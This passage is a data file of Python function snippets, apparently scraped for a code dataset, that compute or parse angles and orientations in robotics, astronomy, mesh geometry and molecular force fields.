a[\"forceRL\"] = astate[:, 120:126]\n # FX0-MZ0\n a[\"forceLL\"] = astate[:, 126:132]\n # FX1-MZ1\n a[\"forceRA\"] = astate[:, 132:138]\n # FX2-MZ2\n 
a[\"forceLA\"] = astate[:, 138:144]\n # FX3-MZ3\n a[\"acc\"] = astate[:, 144:150]\n # AX0,AY0,AZ0,AX1,AY1,AZ1\n a[\"gyro\"] = astate[:, 150:153]\n # WX0,WY0,WZ0\n a[\"qrot\"] = astate[:, 153:162]\n # QX0,QY0,QZ0,QW0 (rot matrix)\n a[\"waist_p\"] = astate[:, 162:165]\n # waistPX-waistPZ\n a[\"waist_rot\"] = astate[:, 165:174]\n # waistQX-waistQW (rot matrix)\n a[\"time\"] = astate[:, 174]\n # clockv2\n a[\"controltimev2\"] = astate[:, 175]\n # ControlTimeV2\n\n a[\"type\"] = \"astate\"\n a[\"ang_type\"] = \"rad\"\n\n if angle_unit == \"deg\":\n a[\"enc\"] = 180 / np.pi * a[\"enc\"]\n # Joint angles in degrees\n a[\"ang_type\"] = \"deg\"\n print(\"Warning: enc angles (astate) in degrees!\")\n\n return a", "def Angles(self, degrees=True):\n\n self.__do_essential_memebers_exist__()\n if self.InferElementalDimension() != 2:\n raise ValueError(\"Angles can be computed only for 2D elements\")\n if self.InferSpatialDimension() != 2:\n raise ValueError(\"Angles can be computed only in 2-dimensional plane\")\n\n nodeperelem = self.InferNumberOfNodesPerLinearElement()\n angles = np.zeros((self.nelem, nodeperelem))\n\n norm = lambda x: np.linalg.norm(x,axis=1)\n\n edge_coords = self.points[self.elements[:,:],:]\n if self.element_type == \"tri\":\n AB = edge_coords[:,1,:] - edge_coords[:,0,:]\n AC = edge_coords[:,2,:] - edge_coords[:,0,:]\n BC = edge_coords[:,2,:] - edge_coords[:,1,:]\n\n angles[:,0] = np.einsum(\"ij,ij->i\",AB,AC) / (norm(AB)*norm(AC))\n angles[:,1] = np.einsum(\"ij,ij->i\",AC,BC) / (norm(AC)*norm(BC))\n angles[:,2] = np.einsum(\"ij,ij->i\",BC,-AB)/ (norm(BC)*norm(AB))\n angles = np.arccos(angles)\n\n elif self.element_type == \"quad\":\n AB = edge_coords[:,1,:] - edge_coords[:,0,:]\n BC = edge_coords[:,2,:] - edge_coords[:,1,:]\n CD = edge_coords[:,3,:] - edge_coords[:,2,:]\n DA = edge_coords[:,0,:] - edge_coords[:,3,:]\n\n angles[:,0] = np.einsum(\"ij,ij->i\",AB,BC) / (norm(AB)*norm(BC))\n angles[:,1] = np.einsum(\"ij,ij->i\",BC,CD) / (norm(BC)*norm(CD))\n angles[:,2] = np.einsum(\"ij,ij->i\",CD,DA) / (norm(CD)*norm(DA))\n angles[:,3] = np.einsum(\"ij,ij->i\",DA,-AB)/ (norm(DA)*norm(AB))\n angles = np.arccos(angles)\n\n if degrees:\n angles *= 180/np.pi\n\n return angles", "def convert_coords(date, time_steps, azs, els, obs):\n coord_start_day = datetime(date.year, date.month, date.day)\n \n strategy = []\n for time_step, az, el in zip(time_steps, azs, els):\n if az % np.pi == 0.0: \n az += EPS\n \n ra, dec = sphere.altaz_to_ra_dec(coord_start_day + timedelta(hours=time_step), az, el, obs)\n strategy.append([ra, dec])\n \n return np.array(strategy)", "def solar_angles(df, lat, lon, alt=0):\n\n jd = pd.Timestamp(df).to_julian_date()\n\n # offset (2451543.5)\n d_offset = pd.Timestamp('1999-12-31 00:00:00').to_julian_date()\n\n d = jd - d_offset\n\n\n # Keplerian elements for the sun (geocentric)\n w = 282.9404 + 4.70935E-5 * d # longitude of perihelion [degrees]\n a = 1.0 # mean distance [AU]\n e = 0.016709 - 1.151E-9 * d # eccentricity [-]\n M = np.mod(356.0470 + 0.9856002585 * d, 360.0) # mean anomaly [degrees]\n L = w + M # Sun's mean longitude [degrees]\n oblecl = 23.4393 - 3.563E-7 * d # Sun's obliquity of the eliptic [degrees]\n\n # Auxiliary angle [degrees]\n E = M + (180.0 / np.pi) * e * np.sin(np.deg2rad(M)) * (1.0 + e * np.cos(np.deg2rad(M)))\n\n # Rectangular coordinates in the plane of the ecliptic (x-axis toward perihelion)\n x = np.cos(np.deg2rad(E)) - e\n y = np.sin(np.deg2rad(E)) * np.sqrt(1 - (e ** 2))\n\n # Distance (r) and true anomaly (v)\n r = np.sqrt((x ** 2) + 
(y ** 2))\n v = np.rad2deg(np.arctan2(y, x))\n\n # Longitude of the sun\n lon_sun = v + w\n\n # Ecliptic rectangular coordinates\n xeclip = r * np.cos(np.deg2rad(lon_sun))\n yeclip = r * np.sin(np.deg2rad(lon_sun))\n zeclip = 0.0\n\n # Rotate coordinates to equatorial rectangular coordinates\n xequat = xeclip\n yequat = yeclip * np.cos(np.deg2rad(oblecl)) + zeclip * np.sin(np.deg2rad(oblecl))\n zequat = yeclip * np.sin(np.deg2rad(23.4406)) + zeclip * np.cos(np.deg2rad(oblecl))\n\n # Convert equatorial rectangular coordinates to right-ascension (RA) and declination\n r = np.sqrt(xequat ** 2 + yequat ** 2 + zequat ** 2) - (alt / 149598000.0)\n RA = np.rad2deg(np.arctan2(yequat, xequat))\n delta = np.rad2deg(np.arcsin(zequat / r))\n\n # Calculate local siderial time\n uth = df.hour + (df.minute / 60.0) + (df.second / 3600.0)\n gmst0 = np.mod(L + 180.0, 360.0) / 15.0\n sidtime = gmst0 + uth + (lon / 15.0)\n\n # Replace RA with hour-angle (HA)\n HA = sidtime * 15.0 - RA\n\n # Convert to rectangular coordinates\n x = np.cos(np.deg2rad(HA)) * np.cos(np.deg2rad(delta))\n y = np.sin(np.deg2rad(HA)) * np.cos(np.deg2rad(delta))\n z = np.sin(np.deg2rad(delta))\n\n # Rotate along an axis going East-West\n xhor = x * np.cos(np.deg2rad(90.0 - lat)) - z * np.sin(np.deg2rad(90.0 - lat))\n yhor = y\n zhor = x * np.sin(np.deg2rad(90.0 - lat)) + z * np.cos(np.deg2rad(90.0 - lat))\n\n # Find azimuthal and elevation angles\n azimuthal = np.rad2deg(np.arctan2(yhor, xhor)) + 180.0\n elevation = np.rad2deg(np.arcsin(zhor))\n\n zenith = 90.0 - elevation\n\n return np.column_stack((zenith, elevation, azimuthal))", "def angles(self):\n penult = self._coordinates[-2]\n last = self._coordinates[-1]\n angles = []\n for c in self._coordinates:\n angle = (math.atan2(penult[0]-last[0], penult[1]-last[1]) -\n math.atan2(c[0]-last[0], c[1]-last[1]))\n angles.append(angle)\n penult, last = last, c\n return sorted(angles)", "def magnitude_orientation(gx, gy):\n \n magnitude = np.sqrt(gx**2 + gy**2)\n orientation = (np.arctan2(gy, gx) * 180 / np.pi) % 180\n \n return magnitude, orientation", "def merdianArcLength(**kwargs):\n a = 0\n b = 0\n kwargs[\"radius\"] = \"M\"\n try:\n if kwargs[\"ref\"] == \"local\":\n a = 6378249.145\n b = 6356515\n elif kwargs[\"ref\"] == \"global\":\n a = 6378137\n b = 6356752.314\n elif kwargs[\"a\"] and kwargs[\"b\"]:\n a = kwargs[\"a\"]\n b = kwargs[\"b\"]\n except KeyError:\n return {\"erreur\": \"params a and b is required, you can use ref too which has two possible value: local and global\"}\n try:\n kwargs[\"phi\"] = kwargs[\"phi1\"]\n M1 = rayonDeCourbur(**kwargs)[\"M\"]\n kwargs[\"phi\"] = kwargs[\"phi2\"]\n M2 = rayonDeCourbur(**kwargs)[\"M\"]\n deltaPhi = abs(kwargs[\"phi2\"]-kwargs[\"phi1\"])\n if 2 <= deltaPhi < 5:\n e2 = 1-(b/a)**2\n Mm = (M1+M2)/2\n phiM = (kwargs[\"phi1\"]+kwargs[\"phi2\"])/2\n S = ((M1+M2+4*Mm)*deltaPhi +\n ((math.cos(math.radians(2*phiM))*deltaPhi**5)*(a*e2)/240))/6\n return {\"S\": S}\n elif deltaPhi < 2:\n e2 = 1-(b/a)**2\n Mm = (M1+M2)/2\n phiM = (kwargs[\"phi1\"]+kwargs[\"phi2\"])/2\n S = Mm*deltaPhi+(a*e2*math.cos(2*phiM)*deltaPhi**3)/3\n return {\"S\": S}\n except KeyError:\n return {\"error\": \"the function required 3 basics params phi1,phi2 and ref or a&b\"}", "def light_dir_from_angles(theta, phi, source_tilt):\n theta += source_tilt[0]\n phi += source_tilt[1]\n rho = 1\n phi_rad = np.radians(-phi)\n theta_rad = np.radians(theta)\n x = np.sin(phi_rad)*np.cos(theta_rad)*rho\n y = np.sin(phi_rad)*np.sin(theta_rad)*rho\n z = rho*np.cos(phi_rad)\n return x, 
y, z", "def get_angle(RgmNet, Nodeid):\n # angle = []\n angle = {}\n para = RgmNet.get_motion_para(Nodeid)\n for i in range(len(Nodeid)):\n temp_para = para[str(Nodeid[i])]\n angle.update({str(Nodeid[i]): temp_para[0]})\n # angle.append(temp_para[0])\n print(\"the angle of id %d is %f\" % (Nodeid[i], temp_para[0]))\n return angle", "def get_angle(RgmNet, Nodeid):\n # angle = []\n angle = {}\n para = RgmNet.get_motion_para(Nodeid)\n for i in range(len(Nodeid)):\n temp_para = para[str(Nodeid[i])]\n angle.update({str(Nodeid[i]): temp_para[0]})\n # angle.append(temp_para[0])\n print(\"the angle of id %d is %f\" % (Nodeid[i], temp_para[0]))\n return angle", "def get_shot_angles(self, shot_loc):\n return (self.trajectory_algo.calc_yaw(shot_loc), self.trajectory_algo.calc_pitch(shot_loc))", "def test_extract_rot_angle():\n v = np.zeros((4,2))\n try:\n angle = extract_rot_angle(v,min_points=0)\n except AssertionError,err:\n assert err.args[0]==\"Zero velocities not allowed.\"\n \n v[:,1] = 1.\n try:\n angle = extract_rot_angle(v,min_points=0)\n except AssertionError,err:\n assert err.args[0]==\"Failed to get both forward and backward directions.\"\n\n # Forwards-backwards motion.\n v[:,1] = 0.\n v[:2,0] = -1.1\n v[2:,0] = 1.2\n angle = extract_rot_angle(v,min_points=0)\n assert np.isclose(angle,np.pi)\n\n # Forwards-backwards motion.\n v[:,0] = 0.\n v[:2,1] = -.9\n v[2:,1] = .8\n angle = extract_rot_angle(v,min_points=0)\n assert np.isclose(angle,-np.pi/2)\n\n # Forwards-backwards motion with noise.\n v[:2,1] += (np.random.rand(2)*2-1)/10\n v[2:,1] += (np.random.rand(2)*2-1)/10\n angle = extract_rot_angle(v,min_points=0)\n assert np.isclose(angle,-np.pi/2,atol=.1)", "def rotation_angle_to_object(object_info, point):\n object_coords = object_info['axisAlignedBoundingBox']['center'] if 'axisAlignedBoundingBox' in object_info else \\\n object_info['position']\n\n x_delta = object_coords['x'] - point['x']\n z_delta = object_coords['z'] - point['z']\n r = np.sqrt(np.square(x_delta) + np.square(z_delta))\n\n angle = np.arctan2(x_delta / r, z_delta / r) * 180 / np.pi\n\n if angle < 0:\n angle += 360\n if angle > 360.0:\n angle -= 360.0\n return angle", "def steps_to_angle():\n pass", "def getBalanceAngles():\n\n balance_angles = RoboCaller().call(\"getBalanceAngles\", \"int\")\n for i in range(len(balance_angles)):\n balance_angles[i] = (balance_angles[i] + 2**15) % 2**16 - 2**15\n return balance_angles", "def azel2radec(az,el,mjd,lat=47.8781,lon=-87.6298):\n \n T_UT1 = (mjd-51544.5)/36525;\n ThetaGMST = 67310.54841 + (876600*3600 + 8640184.812866)*T_UT1 + \\\n .093104*(T_UT1**2) - (6.2e-6)*(T_UT1**3)\n ThetaGMST = np.mod((np.mod(ThetaGMST,86400*(ThetaGMST/np.abs(ThetaGMST)))/240),360)\n ThetaLST = ThetaGMST + lon\n \n DEC = asind(sind(el)*sind(lat)+cosd(el)*cosd(lat)*cosd(az))\n LHA = atand2(-sind(az)*cosd(el)/cosd(DEC), \n (sind(el)-sind(DEC)*sind(lat))/(cosd(DEC)*cosd(lat)))*(180/np.pi);\n RA = np.mod(ThetaLST-LHA,360);\n \n return RA,DEC", "def euler_angles(quatX,quatY,quatZ,quatW):\n\n\troll1 = 2.0 * (quatW * quatX + quatY * quatZ)\n\troll2 = (1.0 - 2.0) * (quatX * quatX + quatY * quatY)\n\n\tyaw1 = 2.0 * (quatW * quatZ + quatX * quatY)\n\tyaw2 = 1.0 - 2.0 * (quatY * quatY + quatZ * quatZ)\n\n\troll = math.atan2(roll1,roll2)\n\tpitch = math.asin(max(-1.0, min(1.0, 2.0 *(quatW * quatY - quatZ * quatX))))\n\tyaw = math.atan2(yaw1,yaw2)\n\n\troll_w = int(((roll + (math.pi)) / (math.pi * 2.0) * 18))\n\tpitch_w = int(pitch + (math.pi/2.0)/math.pi * 18)\n\tyaw_w = int(yaw + (math.pi / (math.pi * 2.0)) * 
18)\n\n\teulerAngles = [roll_w,pitch_w,yaw_w]\n\treturn eulerAngles", "def extractRotate(self,groups):\n self.rotate = math.pi * float(groups[0]) / 180\n self.rX = 0\n self.rY = 0\n if len(groups) == 3:\n if groups[1]:\n \tself.rX = float(groups[1])\n if groups[2]:\n \tself.rY = float(groups[2])\n\n #alpha = float(self.rotate)\n alpha = self.rotate\n cx = self.rX\n cy = self.rY\n self.matrix = [ [\n math.cos(alpha),\n -math.sin(alpha),\n -cx * math.cos(alpha) + cy * math.sin(alpha) + cx\n ],\n [\n math.sin(alpha),\n math.cos(alpha),\n -cx * math.sin(alpha) - cy * math.cos(alpha) + cy\n ]\n ]", "def get_inplane_angle(ima,ref, iring=1, fring=-1, ringstep=1, xtransSearch=0, ytransSearch=0, stp=1, center=1):\n\n\tfrom alignment import Numrinit, ringwe, Applyws, ormq\n\tfrom filter import fshift\n\n\tfirst_ring=int(iring); last_ring=int(fring); rstep=int(ringstep); xrng=int(xtransSearch); yrng=int(ytransSearch); step=int(stp)\t\n\tnx=ima.get_xsize()\n\tif(last_ring == -1): last_ring=int(nx/2)-2\n\tcnx = int(nx/2)+1\n \tcny = cnx\n \tmode = \"F\"\n \t#precalculate rings\n\tnumr = Numrinit(first_ring, last_ring, rstep, mode)\n \twr = ringwe(numr, mode)\n\tif(center==1):\n\t\tcs = [0.0]*2 # additio\n\t\tcs = ref.phase_cog()\n\t\tref1 = fshift(ref, -cs[0], -cs[1])\n\t\tcimage=Util.Polar2Dm(ref1, cnx, cny, numr, mode)\n\t\tcs = ima.phase_cog()\n\t\tima1 = fshift(ima, -cs[0], -cs[1])\n\telse:\n\t\tima1=ima.copy()\n\t\tcimage=Util.Polar2Dm(ref, cnx, cny, numr, mode)\n\tUtil.Frngs(cimage, numr)\n\tApplyws(cimage, numr, wr)\n\t[angt, sxst, syst, mirrort, peakt]=ormq(ima1, cimage, xrng, yrng, step, mode, numr, cnx, cny)\n\treturn angt,sxst, syst, mirrort, peakt", "def parse_angle(keyword_args, lineno=None):\n\n ret = []\n name = keyword_args['name']\n angle = obj_dict['angle'].get(name)\n\n #if angle is not None:\n # return [angle, angle.p1, angle.p2, angle.p3]\n if angle is None:\n angle = primitives.Angle(name)\n obj_dict['angle'][name] = angle\n if name and not (keyword_args.get(\"p1\") or keyword_args.get(\"p2\") or keyword_args.get(\"p3\")):\n p1 = obj_dict['point'].get(name[0])\n if p1 is None:\n p1 = primitives.Point(name[0])\n obj_dict['point'][name[0]] = p1\n p2 = obj_dict['point'].get(name[1])\n if p2 is None:\n p2 = primitives.Point(name[1])\n obj_dict['point'][name[1]] = p2\n p3 = obj_dict['point'].get(name[2])\n if p3 is None:\n p3 = primitives.Point(name[2])\n obj_dict['point'][name[2]] = p3\n\n else:\n p1 = keyword_args.get(\"p1\")\n if p1 is not None:\n p1 = obj_dict['point'].get(p1)\n if p1 is None:\n p1 = primitives.Point(keyword_args.get(\"p1\"))\n obj_dict['point'][keyword_args.get(\"p1\")] = p1\n p2 = keyword_args.get(\"p2\")\n if p2 is not None:\n p2 = obj_dict['point'].get(p2)\n if p2 is None:\n p2 = primitives.Point(keyword_args.get(\"p2\"))\n obj_dict['point'][keyword_args.get(\"p2\")] = p2\n p3 = keyword_args.get(\"p3\")\n if p3 is not None:\n p3 = obj_dict['point'].get(p3)\n if p3 is None:\n p3 = primitives.Point(keyword_args.get(\"p3\"))\n obj_dict['point'][keyword_args.get(\"p3\")] = p3\n\n big = keyword_args.get(\"big\")\n if big is not None:\n angle.big = big\n\n if (p1.x is not None and p2.x is not None and p3.x is not None):\n\n degree = get_degree(p1, p2, p3)\n\n if angle.big:\n if degree < 0:\n p4 = p1\n p1 = p3\n p3 = p4\n degree = 360 + degree\n else:\n degree = 360 - degree\n else:\n if degree > 0:\n p4 = p1\n p1 = p3\n p3 = p4\n else:\n degree = -1 * degree\n\n angle.degree = degree\n\n angle.p1 = p1\n angle.p2 = p2\n angle.p3 = p3\n 
ret.append(\"angle_\"+angle.name)\n ret.append(\"point_\"+p1.name)\n ret.append(\"point_\"+p2.name)\n ret.append(\"point_\"+p3.name)\n\n return ret", "def azimuth(source):\n srcAzEl = subarrayControl.s.azel(source, 0.0);\n return srcAzEl[0];", "def angles(self):\n\n return self._angles", "def find_angle(im_binary: np.ndarray) -> float:\n angles = np.linspace(-np.pi/2, np.pi/2, 360)\n h, theta, d = skimage.transform.hough_line(im_binary, theta=angles)\n _, angles, distances = skimage.transform.hough_line_peaks(\n h, theta, d, num_peaks=1)\n return angles, distances", "def read_data(self):\r\n\t\tdata0 = bus.read_byte(A1332_DEFAULT_ADDRESS)\r\n\t\tdata1 = bus.read_byte(A1332_DEFAULT_ADDRESS)\r\n\t\t\r\n\t\ttime.sleep(0.5)\r\n\t\t\r\n\t\t# Checking valid data\r\n\t\twhile (data0 == 0) and (data1 == 0) :\r\n\t\t\tdata0 = bus.read_byte(A1332_DEFAULT_ADDRESS)\r\n\t\t\tdata1 = bus.read_byte(A1332_DEFAULT_ADDRESS)\r\n\t\t\r\n\t\t# Convert the data to 12-bits\r\n\t\traw_adc = ((data0 & 0x0F) * 256.0) + data1\r\n\t\tangle = (raw_adc / 4096.0) * 360.0\r\n\t\t\r\n\t\treturn {'a' : angle}", "def get_angle_contrib(self, groupBy='m'):\n ias3 = []\n types3_z = []\n types3_m = []\n\n e3 = 0.0\n es3 = []\n for aj in self.m.GetAtoms():\n j = aj.GetIdx()\n zj = self.zs[j]\n neibs = aj.GetNeighbors()\n nneib = len(neibs)\n if zj > 1 and nneib > 1:\n for i0 in range(nneib):\n for k0 in range(i0+1,nneib):\n eijk = 0.0\n i, k = neibs[i0].GetIdx(), neibs[k0].GetIdx()\n ias = [i,j,k]\n ias3.append(ias)\n\n ap1, ap2, ap3 = [ self.atypes[ia] for ia in ias ]\n if ap1 > ap3:\n tv = ap1; ap1 = ap3; ap3 = tv # tv: temperay value\n types3_m.append( '-'.join( [ap1, ap2, ap3] ) )\n\n z1, z2, z3 = [ self.zs[ia] for ia in ias ]\n if z1 > z3:\n tv = z1; z1 = z3; z3 = tv\n types3_z.append( '-'.join(['%d'%zi for zi in [z1,z2,z3] ]) )\n\n theta = rdMolTransforms.GetAngleRad(self.m.GetConformer(), i, j, k)\n cosT = np.cos(theta)\n ka, theta0 = rcr.GetUFFAngleBendParams(self.m, i, j, k)\n theta0 = theta0*np.pi/180.0\n cosT0 = np.cos(theta0); sinT0 = np.sin(theta0)\n\n #print ' -- atypes = ', self.atypes\n hybj = self.hybs[j]\n if hybj == 'SP':\n eijk = ka*(1.0 + np.cos(theta))\n elif hybj == 'SP2':\n # energy expression from Openbabel's src file \"forcefielduff.cpp',\n # different from that of Rappe's bad formula,\n eijk = (ka/4.5)*(1.0 + (1.0 + cosT)*(4.0*cosT))\n elif hybj == 'SP3':\n c2 = 1.0 / (4.0 * sinT0 * sinT0)\n c1 = -4.0 * c2 * cosT0;\n c0 = c2*(2.0*cosT0*cosT0 + 1.0);\n eijk = ka*(c0 + c1*cosT + c2*(2.0*cosT*cosT - 1.0))\n else:\n print('not supported atomic type: %s'%apj)\n assert 0\n\n e3 += eijk\n es3.append(eijk)\n self.e3 = e3\n self.es3 = es3\n self.n3 = len(es3)\n self.types3 = {'m':types3_m, 'n':types3_z}[groupBy]\n #return e3, n3, types3, es3", "def direction_coordinates(self, gc_lines):\n lins = [(_line[0][mid], _line[0][mid + 1], _line[1][mid], _line[1][mid + 1])\n for _line, mid in zip(gc_lines, [len(_line[0]) // 2 for _line in gc_lines])\n if len(_line[0]) > 2]\n lens = [np.hypot(_line[0][0] - _line[0][-1], _line[0][0] - _line[0][-1]) * 110.\n for _line in gc_lines\n if len(_line[0]) > 2]\n lins = [(x0 * np.cos(np.deg2rad(np.mean([y0, y1]))), x1 * np.cos(np.deg2rad(np.mean([y0, y1]))), y0, y1)\n for x0, x1, y0, y1 in lins]\n lins = [_x for _x, _l in zip(lins, lens) if _l > 10]\n\n direction = [(0.5 * (x0 + x1), 0.5 * (y0 + y1), x1 - x0, y1 - y0) for x0, x1, y0, y1 in lins]\n direction = [(_u, _v, _x / np.hypot(_x, _y), _y / np.hypot(_x, _y))\n for _u, _v, _x, _y in direction]\n los = [rotate_point(point[2:], 
-self.dsbObsAngleAzimuth.value()) for point in direction]\n\n dist = 1.\n tp_dir = (np.array(los).T * dist).T\n\n tps = [(x0, y0, x0 + tp_x, y0 + tp_y) for\n ((x0, y0, _, _), (tp_x, tp_y)) in zip(direction, tp_dir)]\n tps = [[(x0 / np.cos(np.deg2rad(y0)), y0), (x1 / np.cos(np.deg2rad(y0)), y1)] for (x0, y0, x1, y1) in tps]\n return tps", "def _calc_azel(cache, name, ant):\n real_sensor = '%s_pos_actual_scan_%s' % \\\n (ant, 'azim' if name.endswith('az') else 'elev')\n cache[name] = sensor_data = katpoint.deg2rad(cache.get(real_sensor))\n return sensor_data", "def _determine_extra_angles(self, angle_force, reference_topology, growth_indices):\n from simtk import openmm\n import itertools\n from openeye import oechem, oeomega\n\n if len(growth_indices)==0:\n return\n angle_force_constant = 400.0*unit.kilojoules_per_mole/unit.radians**2\n atoms = list(reference_topology.atoms())\n growth_indices = list(growth_indices)\n #get residue from first atom\n residue = atoms[growth_indices[0].idx].residue\n try:\n oemol = FFAllAngleGeometryEngine._oemol_from_residue(residue)\n except Exception as e:\n print(\"Could not generate an oemol from the residue.\")\n print(e)\n\n #get the omega geometry of the molecule:\n\n omega = oeomega.OEOmega()\n omega.SetMaxConfs(1)\n omega.SetStrictStereo(False) #TODO: fix stereochem\n omega(oemol)\n\n #we now have the residue as an oemol. Time to find the relevant angles.\n #There's no equivalent to OEGetTorsions, so first find atoms that are relevant\n #TODO: find out if that's really true\n aromatic_pred = oechem.OEIsAromaticAtom()\n heavy_pred = oechem.OEIsHeavy()\n angle_criteria = oechem.OEAndAtom(aromatic_pred, heavy_pred)\n\n #get all heavy aromatic atoms:\n #TODO: do this more efficiently\n heavy_aromatics = list(oemol.GetAtoms(angle_criteria))\n for atom in heavy_aromatics:\n #bonded_atoms = [bonded_atom for bonded_atom in list(atom.GetAtoms()) if bonded_atom in heavy_aromatics]\n bonded_atoms = list(atom.GetAtoms())\n for angle_atoms in itertools.combinations(bonded_atoms, 2):\n angle = oechem.OEGetAngle(oemol, angle_atoms[0], atom, angle_atoms[1])\n atom_indices = [angle_atoms[0].GetData(\"topology_index\"), atom.GetData(\"topology_index\"), angle_atoms[1].GetData(\"topology_index\")]\n angle_radians = angle*unit.radian\n growth_idx = self._calculate_growth_idx(atom_indices, growth_indices)\n #If this is a CustomAngleForce, we need to pass the parameters as a list, and it will have the growth_idx parameter.\n #If it's a regular HarmonicAngleForce, there is no growth_index and the parameters are passed separately.\n if isinstance(angle_force, openmm.CustomAngleForce):\n angle_force.addAngle(atom_indices[0], atom_indices[1], atom_indices[2], [angle_radians, angle_force_constant, growth_idx])\n elif isinstance(angle_force, openmm.HarmonicAngleForce):\n angle_force.addAngle(atom_indices[0], atom_indices[1], atom_indices[2], angle_radians, angle_force_constant)\n else:\n raise ValueError(\"Angle force must be either CustomAngleForce or HarmonicAngleForce\")\n return angle_force", "def onePassRadon(self, angleAmount):\n rotated_image = self.rotateImage(angleAmount)\n (N, M) = rotated_image.shape\n radon_values = [0]*M\n for radon_line in range(M):\n linesum = 0\n for pixel in range(N):\n linesum += rotated_image[pixel][radon_line]\n radon_values[M - radon_line - 1] = linesum\n #print(radon_values)\n return radon_values", "def greenhouse_orientation():\n \n # NEED TO CHECK THIS WITH COMPASS (OR IPHONE)\n orientation_angle = 90 # angle between east-west line and 
the length of the greenhouse (0-90 degree)\n orientation_angle = float(orientation_angle)", "def get_angles_description(self):\n s = []\n for ang in self.gonio_angles:\n s.append(\"%s\" % ang)\n if self.wavelength_control:\n for ang in self.wl_angles:\n s.append(\"%s\" % ang)\n return \"\\n\".join(s)", "def azizen(self):\n # x0,y0 array pixel coordinates relative to cx,cy\n# ndy0,ndx0=img.shape\n ndy0=self.ndy0\n ndx0=self.ndx0\n x0,y0=np.meshgrid(np.linspace(0,ndx0-1,ndx0)-self.cx,np.linspace(0,ndy0-1,ndy0)-self.cy)\n r0=np.sqrt(x0**2+y0**2)/self.pr0 # fractional radial distance from 0,0\n# self.roi=np.s_[ystart:ystart+self.ny0,xstart:xstart+self.nx0]\n # why not model the zenith angle dependence with polynomial directly\n # rather than linear interpolation between roots.\n roots=np.zeros(51)\n rr=np.arange(51)/100.0\n for i,ref in enumerate(rr):\n roots[i]=np.real(np.roots([self.c3,0,self.c2,0,self.c1,-ref])[-1])\n theta0 = np.interp(r0/2,rr,roots)\n \n phi0 = np.arctan2(x0,y0) - self.rot ####phi (i.e., azimuth) is reckoned with -pi corresponding to north, increasing clockwise, NOTE: pysolar use sub-standard definition\n phi0 = phi0%(2*np.pi)\n\n #####correction for the tilt of the camera\n k=np.array((np.sin(self.azm),np.cos(self.azm),0))\n a=np.array([np.sin(theta0)*np.cos(phi0),np.sin(theta0)*np.sin(phi0),np.cos(theta0)]); \n a = np.transpose(a,[1,2,0])\n b=np.cos(self.beta)*a + np.sin(self.beta)*np.cross(k,a,axisb=2) \\\n + np.reshape(np.outer(np.dot(a,k),k),(self.ndy0,self.ndx0,3))*(1-np.cos(self.beta))\n theta0=np.arctan(np.sqrt(b[:,:,0]**2+b[:,:,1]**2)/b[:,:,2])\n phi0=np.arctan2(b[:,:,1],b[:,:,0])%(2*np.pi)\n# max_theta *= deg2rad \n# valid0 = (theta0<max_theta) & (theta0>0); \n# theta0[valid0]=np.nan;\n self.theta0,self.phi0=theta0,phi0", "def reorient_obj(obj, step_ang, plane):\n start_angle = 0\n end_angle = math.pi / 2\n min_area = math.inf\n best_angle = 0\n start_axis = array.array(\"d\", obj.Centroid)\n end_axis = []\n index = [0] * 3\n\n if plane == \"xy\":\n index = [1, 1, 0]\n end_axis = array.array(\"d\", [obj.Centroid[0], obj.Centroid[1], obj.Centroid[2] + 1])\n elif plane == \"xz\":\n index = [1, 0, 1]\n end_axis = array.array(\"d\", [obj.Centroid[0], obj.Centroid[1] + 1, obj.Centroid[2]])\n elif plane == \"yz\":\n index = [0, 1, 1]\n end_axis = array.array(\"d\", [obj.Centroid[0] + 1, obj.Centroid[1], obj.Centroid[2]])\n\n min_pt, max_pt = obj.GetBoundingBox()\n # projecting the points to the plane\n project_points_to_plane(min_pt, max_pt, index)\n while start_angle <= end_angle:\n obj.Rotate3D(start_axis, end_axis, step_ang)\n # compute the area\n dims = [(max_pt[0] - min_pt[0]), (max_pt[1] - min_pt[1]), (max_pt[2] - min_pt[2])]\n curr_area = 1\n for dim in dims:\n if dim > 0:\n curr_area *= dim\n if curr_area < min_area:\n min_area = curr_area\n best_angle = start_angle\n start_angle += step_ang\n min_pt, max_pt = obj.GetBoundingBox()\n # projecting the points to the plane\n project_points_to_plane(min_pt, max_pt, index)\n # rotate the object using the best angle\n obj.Rotate3D(start_axis, end_axis, best_angle)", "def determine_rotation_angle(self, landmarks):\n lp = landmarks['left-eye-center-pos']\n rp = landmarks['right-eye-center-pos']\n return angle_between_points(lp, rp)", "def parse_lats(lines):\n class Parser:\n def __init__(self):\n self.state = 'get_utt_id'\n self.utt_id = ''\n self.out = {}\n\n def is_line_utt_id(self, splited_line):\n return len(splited_line) == 1\n\n def new_utt(self, splited_line):\n self.utt_id = splited_line[0]\n 
self.out[self.utt_id] = []\n self.state = 'get_arc'\n\n def start(self):\n self.state = 'get_utt_id'\n self.utt_id = ''\n self.out = {}\n\n def add(self, line):\n splited_line = line.split()\n if self.state == 'get_utt_id':\n assert self.is_line_utt_id(splited_line), RuntimeError(\"parse_lats init error.\")\n self.new_utt(splited_line)\n return\n if self.state == 'get_arc':\n # if self.is_line_utt_id(splited_line):\n # self.new_utt(splited_line)\n # else:\n if len(splited_line) == 4:\n # classic arc\n state_from, state_to, word_id = map(int, splited_line[:3])\n weight_hclg, weight_am, ali = splited_line[3].split(',')\n weight_hclg, weight_am = float(weight_hclg), float(weight_am)\n self.out[self.utt_id].append((state_from, state_to, word_id, weight_hclg, weight_am, ali))\n elif len(splited_line) == 3:\n state_from, state_to, word_id = map(int, splited_line[:3])\n weight_hclg, weight_am, ali = 0.0, 0.0, ''\n self.out[self.utt_id].append((state_from, state_to, word_id, weight_hclg, weight_am, ali))\n elif len(splited_line) == 2:\n # eos arc\n state_from = int(splited_line[0])\n weight_hclg, weight_am, ali = splited_line[1].split(',')\n weight_hclg, weight_am = float(weight_hclg), float(weight_am)\n self.out[self.utt_id].append((state_from, weight_hclg, weight_am, ali))\n elif len(splited_line) == 1:\n state_from = int(splited_line[0])\n self.out[self.utt_id].append((state_from, 0, 0, ''))\n elif len(splited_line) == 0:\n self.state = 'get_utt_id'\n else:\n raise RuntimeError(f\"parse_lats Wrong line in {self.utt_id}: {line}\")\n return\n\n def get_out(self):\n return self.out\n\n parser = Parser()\n parser.start()\n for i, line in enumerate(lines):\n parser.add(line)\n utt2lat = parser.get_out()\n return utt2lat", "def decode_angle(target_angs, num_theta_bins):\n if target_angs.shape[-1] == 2 * num_theta_bins:\n # if target_angs.shape[-1] == num_theta_bins + 1:\n bin_inds = np.argmax(target_angs[..., :num_theta_bins], axis=-1)\n bin_res = target_angs[..., 